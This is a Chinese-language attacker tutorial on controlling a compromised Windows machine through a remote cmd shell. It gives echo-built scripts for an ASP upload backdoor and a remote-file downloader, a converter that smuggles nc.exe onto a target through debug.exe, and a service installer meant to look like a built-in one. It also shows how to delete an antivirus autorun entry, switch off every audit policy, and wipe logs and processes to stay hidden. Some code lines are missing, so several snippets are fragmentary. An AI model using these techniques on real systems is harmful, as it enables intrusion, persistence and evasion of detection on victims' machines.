Cmd Shell(命令行交互)是***永恆的話題,它歷史悠久並且長盛不衰。
本文旨在介紹和總結一些在命令行下控制Windows系統的方法。這些方法都是儘可能地利用系統自帶的工具實現的。
對於溢出漏洞獲得的cmd shell,最大的問題就是如何上傳文件。由於蠕蟲病毒流行,連接ipc$所需要的139或445端口被路由封鎖。再加上WinXP系統加強了對ipc$的保護,通過ipc$及默認共享上傳文件的手段基本無效了。ftp和tftp是兩種可行的方法,介於其已被大家熟知,本文就不介紹了。還有三種大家熟悉的辦法,作爲總結我再提一下:
前提當然是目標主機上已經安裝了IIS。
一般的ASP***"體積"較大,不適合直接用echo命令寫入文件,這裏我提供一個小巧的。
直接給出echo版:
生成的up.asp不能用瀏覽器訪問,只能用下面這個腳本:
if .arguments.count<3 then .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end with
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fn:s=.read:.close
end with
with createobject("microsoft.xmlhttp")
.open "post",url,false:.send s
wscript.echo .statustext
end with
例如:
dir /s ps[1].exe
1 個文件 49,152 字節
copy AB094JIT\ps[1].exe c:\path\ps.exe
del AB094JIT\ps[1].exe
對於以服務爲啓動方式的後門所提供的shell,其用戶身份一般是System。此時網頁緩存目錄的位置就如例子中所示。如果shell的身份不是System,需要修改Default User爲相應的用戶名。
本方法會啓動一個IE進程,記得要將它殺掉。如果是System身份的shell,不會在本地出現窗口而暴露。
另外,用ms-its代替its效果完全一樣。
現成的工具是iGet.vbs。我再給出一個含必要容錯功能的版本。
仍然是echo版:
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> dl.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> dl.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> dl.vbs
前面兩個辦法都不能保證穿過防火牆。而且,除非自己架Web服務器,一般的Web資源都是以壓縮文件的形式提供。如果目標主機沒有解壓工具,還是沒轍。那麼只有出"殺手鐗"了!
fn=right(fp,len(fp)-instrrev(fp,"\"))
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536
with createobject("scripting.filesystemobject").opentextfile(fp&".bat",2,true)
.write "@echo str="""
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt<16 then .write "0"
.write hex(bt)
if i mod 128=0 then .write """_>>debug.vbs"+vbcrlf+"@echo +"""
next
.writeline """>>debug.vbs"+vbcrlf+"@echo with wscript.stdout:r=vbcrlf"_
+":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)"_
+":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
.writeline "@echo .write ""rbx""+r+"""+hex(slh)+"""+r+""rcx""+r+"""+hex(sll)_
+"""+r+""n debug.tmp""+r+""w""+r+""q""+r:end with"_
+">>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp """&fn&"""&del debug.vbs"
end with
稍等一會兒,在當前目錄下將生成一個nc.exe.bat。用記事本等編輯工具打開它,可以看到如下內容:
@echo +"504500004C010400B98EAE340000000000000000E0000F010B010500009800000062000000000000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000"_>>debug.vbs
@echo +"002001003C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000"_>>debug.vbs
@echo +"70970000001000000098000000040000000000000000000000000000200000602E726461746100001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100"_>>debug.vbs
............
............(省略若干行)
............
@echo +"">>debug.vbs
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "e"+hex(256+(i-1)/2):for j=i to i+46 step 2:.write " "+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx"+r+"0"+r+"rcx"+r+"E800"+r+"n debug.tmp"+r+"w"+r+"q"+r:end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp "NC.EXE"&del debug.vbs
如果網速不是很慢的話,整個上傳過程大約需要20秒。
1,大的文件傳輸不穩定,可能會使shell死掉。所以文件越小效果越好。建議原文件不要超過100KB。
2,在傳輸大文件前,可以先傳個小的文件作爲"熱身",讓16位虛擬機ntvdm.exe駐留後臺。所有文件傳完後,爲隱蔽起見,應該把ntvdm進程殺掉。
3,某些cmd shell每個命令都需要附加兩個回車,那nc.exe.bat就不能直接用了。
4,單個命令的長度是有限的,所以不能只用一個echo完成全部任務。而且,對於nc提供的cmd shell,稍長一些的命令竟然會使shell自動退出(溢出了?)。你可以修改"i mod 128=0"語句中的128以調整每個echo命令的長度。每次echo的字符爲這個數乘以2。
5,解碼過程沒有腳本參與也是可以的。使用腳本的目的是減少傳輸的數據量(因爲壓縮了數據)。如果有時間,我會寫一個更完善的腳本,加強數據壓縮能力,增加數據校驗功能。
這節包括三方面內容:註冊表、服務和組策略。
好在系統自帶的regedit.exe足夠用了。
先將想查詢的註冊表項導出,再用type查看,比如:
"PortNumber"=dword:00000d3d
先echo一個reg文件,然後導入,比如:
echo. >>1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] >>1.reg
echo "TelnetPort"=dword:00000913 >>1.reg
echo "NTLM"=dword:00000001 >>1.reg
echo. >>1.reg
regedit /s 1.reg
"KAVRun"=-
上面對註冊表的三個操作,也可以用下面這個inf文件來實現:
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
DelReg=My_DelReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0x00010001,2323
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0x00010001,1
[My_DelReg_Name]
HKLM,SYSTEM\CurrentControlSet\Services\Serv-U
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun
1,[Version]和[DefaultInstall]是必須的,AddReg和DelReg至少要有一個。My_AddReg_Name和My_DelReg_Name可以自定義。
0x00010001表示REG_DWORD數據類型,0x00000000或省略該項(保留逗號)表示REG_SZ(字符串)。0x00020000表示REG_EXPAND_SZ。
2323也可以用0x913代替。
關於inf文件的詳細信息,可以參考DDK幫助文檔。
2,InstallHinfSection是大小寫敏感的。它和setupapi之間只有一個逗號,沒有空格。
128表示給定路徑,該參數其他取值及含義參見MSDN。
特別注意,最後一個參數,必須是inf文件的全路徑,不要用相對路徑。
3,inf文件中的項目都是大小寫不敏感的。
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddService_Name]
DisplayName=Windows Internet Service
Description=提供對 Internet 信息服務管理的支持。
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\inetsvr.exe
1,最後四項分別是
服務類型:0x10爲獨立進程服務,0x20爲共享進程服務(比如svchost);
啓動類型:0 系統引導時加載,1 OS初始化時加載,2 由SCM(服務控制管理器)自動啓動,3 手動啓動,4 禁用。
(注意,0和1只能用於驅動程序)
錯誤控制:0 忽略,1 繼續並警告,2 切換到LastKnownGood的設置,3 藍屏。
服務程序位置:%11%表示system32目錄,%10%表示系統目錄(WINNT或Windows),%12%爲驅動目錄system32\drivers。其他取值參見DDK。你也可以不用變量,直接使用全路徑。
這四項是必須要有的。
2,除例子中的六個項目,還有LoadOrderGroup、Dependencies等。不常用所以不介紹了。
3,inetsvr後面有兩個逗號,因爲中間省略了一個不常用的參數flags。
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
DelService=inetsvr
1,導出一個系統自帶服務的註冊表項,你會發現其執行路徑是這樣的:
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,74,\
00,6c,00,6e,00,74,00,73,00,76,00,72,00,2e,00,65,00,78,00,65,00,00,00
可讀性太差。其實它就是%SystemRoot%\system32\tlntsvr.exe,但數據類型是REG_EXPAND_SZ。當手動導入註冊表以增加服務時,這樣定義ImagePath顯然很不方便。如果用REG_SZ代替會有些問題--不能用環境變量了。即只能使用完整路徑。用inf文件完全沒有這個問題,ServiceBinary(即ImagePath)自動成爲REG_EXPAND_SZ。
2,最關鍵的是,和用SC等工具一樣,inf文件的效果是即時起效的,而導入reg後必須重啓纔有效。
3,inf文件會自動爲服務的註冊表項添加一個Security子鍵,使它看起來更像系統自帶的服務。
secedit /analyze
secedit /configure
secedit /export
secedit /validate
secedit /refreshpolicy
5個命令的功能分別是分析組策略、配置組策略、導出組策略、驗證模板語法和更新組策略。其中secedit /refreshpolicy 在XP/2003下被gpupdate代替。這些命令具體的語法自己在命令行下查看就知道了。
signature="$CHICAGO$"
[System Access]
MinimumPasswordLength = 6
PasswordComplexity = 1
/quiet參數表示"安靜模式",不產生日誌。但根據我的試驗,在2000sp4下該參數似乎不起作用,XP下正常。日誌總是保存在%windir%\security\logs\scesrv.log。你也可以自己指定日誌以便隨後刪除它。比如:
del gp.*
echo版:
echo signature="$CHICAGO$" >>1.inf
echo [Event Audit] >>1.inf
echo AuditSystemEvents=0 >>1.inf
echo AuditObjectAccess=0 >>1.inf
echo AuditPrivilegeUse=0 >>1.inf
echo AuditPolicyChange=0 >>1.inf
echo AuditAccountManage=0 >>1.inf
echo AuditProcessTracking=0 >>1.inf
echo AuditDSAccess=0 >>1.inf
echo AuditAccountLogon=0 >>1.inf
echo AuditLogonEvents=0 >>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log /quiet
del 1.*
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>1.reg
echo "forceguest"=dword:00000000 >>1.reg
regedit /s 1.reg
del 1.reg
echo signature="$CHICAGO$" >>1.inf
echo [Registry Values] >>1.inf
echo MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0 >>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log
del 1.*
系統默認的安全數據庫位於%windir%\security\database\secedit.sdb,將它導出至inf文件:
Windows自帶的關於網絡的命令行工具很多,比如大家熟悉的ping,tracert,ipconfig,telnet,ftp,tftp,netstat,還有不太熟悉的nbtstat,pathping,nslookup,finger,route,netsh......
這些命令又可分成三類:網絡檢測(如ping)、網絡連接(如telnet)和網絡配置(如netsh)。前面兩種相對簡單,本文只介紹兩個網絡配置工具。
在遠程shell中使用netsh首先要解決一個交互方式的問題。前面說過,很多shell不能再次重定向輸出輸出,所以不能在這種環境下交互地使用ftp等命令行工具。解決的辦法是,一般交互式的工具都允許使用腳本(或者叫應答文件)。比如ftp -s:filename。netsh也是這樣:netsh -f filename。
echo show config >>s
netsh -f s
del s
這個命令和ipconfig /all差不多。
net start remoteaccess
echo show ipnet >>s
netsh -f s
del s
echo show tcpconn >>s
echo show udpconn >>s
netsh -f s
del s
如果netsh命令都有其他命令可代替,那它還有什麼存在的必要呢?下面這個就找不到代替的了。
echo show interface >>s
netsh -f s
del s
首先需要指出的是,IPSec和TCP/IP篩選是不同的東西,大家不要混淆了。TCP/IP篩選的功能十分有限,遠不如IPSec靈活和強大。下面就說說如何在命令行下控制IPSec。
在設置IPSec策略方面,ipseccmd命令的語法和ipsecpol幾乎完全一樣,所以只以ipsecpol爲例:
具體含義如下:
-p myfirewall 指定策略名爲myfirewall
-r rpc-dcom 指定規則名爲rpc-dcom
-f ...... 建立7個篩選器。*表示任何地址(源);0表示本機地址(目標);+表示鏡像(雙向)篩選。詳細語法見ipsecpol -?
-n BLOCK 指定篩選操作是"阻塞"。注意,BLOCK必須是大寫。
-w reg 將配置寫入註冊表,重啓後仍有效。
-x 立刻激活該策略。
注意,該規則同時也阻止了該主機ping別人。
假設你在某主機上安裝了DameWare Mini Remote Control。爲了保護它不被別人暴破密碼或溢出,應該限制對其服務端口6129的訪問。
ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.89+0:6129:tcp -n PASS -w reg -x
如果你是動態IP,應該根據IP分配的範圍設置規則。比如:
ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.*+0:6129:tcp -n PASS -w reg -x
Task Scheduler 服務正在啓動 ..
Task Scheduler 服務已經啓動成功。
12:34
新加了一項作業,其作業 ID = 1
如果測試結果不理想,就刪除該策略。
對於XP很簡單,一條命令搞定--ipseccmd show filters
而ipsecpol沒有查詢的功能。需要再用一個命令行工具netdiag。它位於2000系統安裝盤的SUPPORT\TOOLS\SUPPORT.CAB中。(已經上傳了三個文件,也就不在乎多一個了。^_^)
netdiag /debug /test:ipsec
一個軟件/工具的安裝過程,一般來說只是做兩件事:拷貝文件到特定目錄和修改註冊表。只要搞清楚具體的內容,那麼就可以自己在命令行下實現了。(不考慮安裝後需要註冊激活等情況)
除去反安裝的部分,關鍵的文件有三個:wpcap.dll,packet.dll和npf.sys。前面兩個文件位於system32目錄下,第三個在system32\drivers下。而註冊表的變化是增加了一個系統服務NPF。注意,是系統服務(即驅動)不是Win32服務。
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=NPF,,winpcap_svr
[winpcap_svr]
DisplayName=Netgroup Packet Filter
ServiceType=0x1
StartType=3
ErrorControl=1
ServiceBinary=%12%\npf.sys
再寫一個批處理_wpcap_.bat:
del _wpcap_.inf
if /i %CD%==%SYSTEMROOT%\system32 goto COPYDRV
copy packet.dll %SYSTEMROOT%\system32\
copy wpcap.dll %SYSTEMROOT%\system32\
del packet.dll
del wpcap.dll
:COPYDRV
if /i %CD%==%SYSTEMROOT%\system32\drivers goto END
copy npf.sys %SYSTEMROOT%\system32\drivers\
del npf.sys
:END
del %0
由於系統補丁有可能要替換正在被執行或訪問的文件,所以用copy命令是不行的。
幸好,Windows補丁包支持命令行安裝。
比如:
-z 不重起
-q 安靜模式
for %%f in (KB??????.exe) do del %%f
del %0
很多事用腳本來做是很簡潔的。下面給出幾個常用腳本的echo版。
@echo ("winmgmts:\\.\root\cimv2:win32_operatingsystem").instances_ >>ps.vbs
@echo wscript.echo ps.caption^&" "^&ps.version:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pk.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pk.vbs
cscript pk.vbs 123
del pk.vbs
@echo ("winmgmts:{(shutdown)}!\\.\root\cimv2:win32_operatingsystem").instances_ >>rb.vbs
@echo os.win32shutdown(2):next >>rb.vbs & cscript //nologo rb.vbs & del rb.vbs
@echo if sc.startmode="Auto" then wscript.echo sc.name^&" - "^&sc.pathname >>sc.vbs
@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs
@echo if sc.state="Running" then wscript.echo sc.name^&" - "^&sc.pathname >>sc.vbs
@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_operatingsystem").instances_ >>bt.vbs
@echo wscript.echo os.lastbootuptime:next >>bt.vbs & cscript //nologo bt.vbs & del bt.vbs
yyyymmddHHMMSSxxxxxxZZZZ
_年_月日時分秒_微秒_時區
@echo ("winmgmts:\\.\root\cimv2:win32_perfrawdata_perfos_system").instances_ >>rt.vbs
@echo s=os.timestamp_sys100ns:l=len(s):s=left(s,l-7):for i=1 to l-7 >>rt.vbs
@echo t=t^&mid(s,i,1):d=t\86400:r=r^&d:t=t mod 86400:next >>rt.vbs
@echo wscript.echo cint(r)^&"d "^&t\3600^&"h "^&t\60 mod 60^&"m "^&t mod 60^&"s":next >>rt.vbs
cscript //nologo rt.vbs & del rt.vbs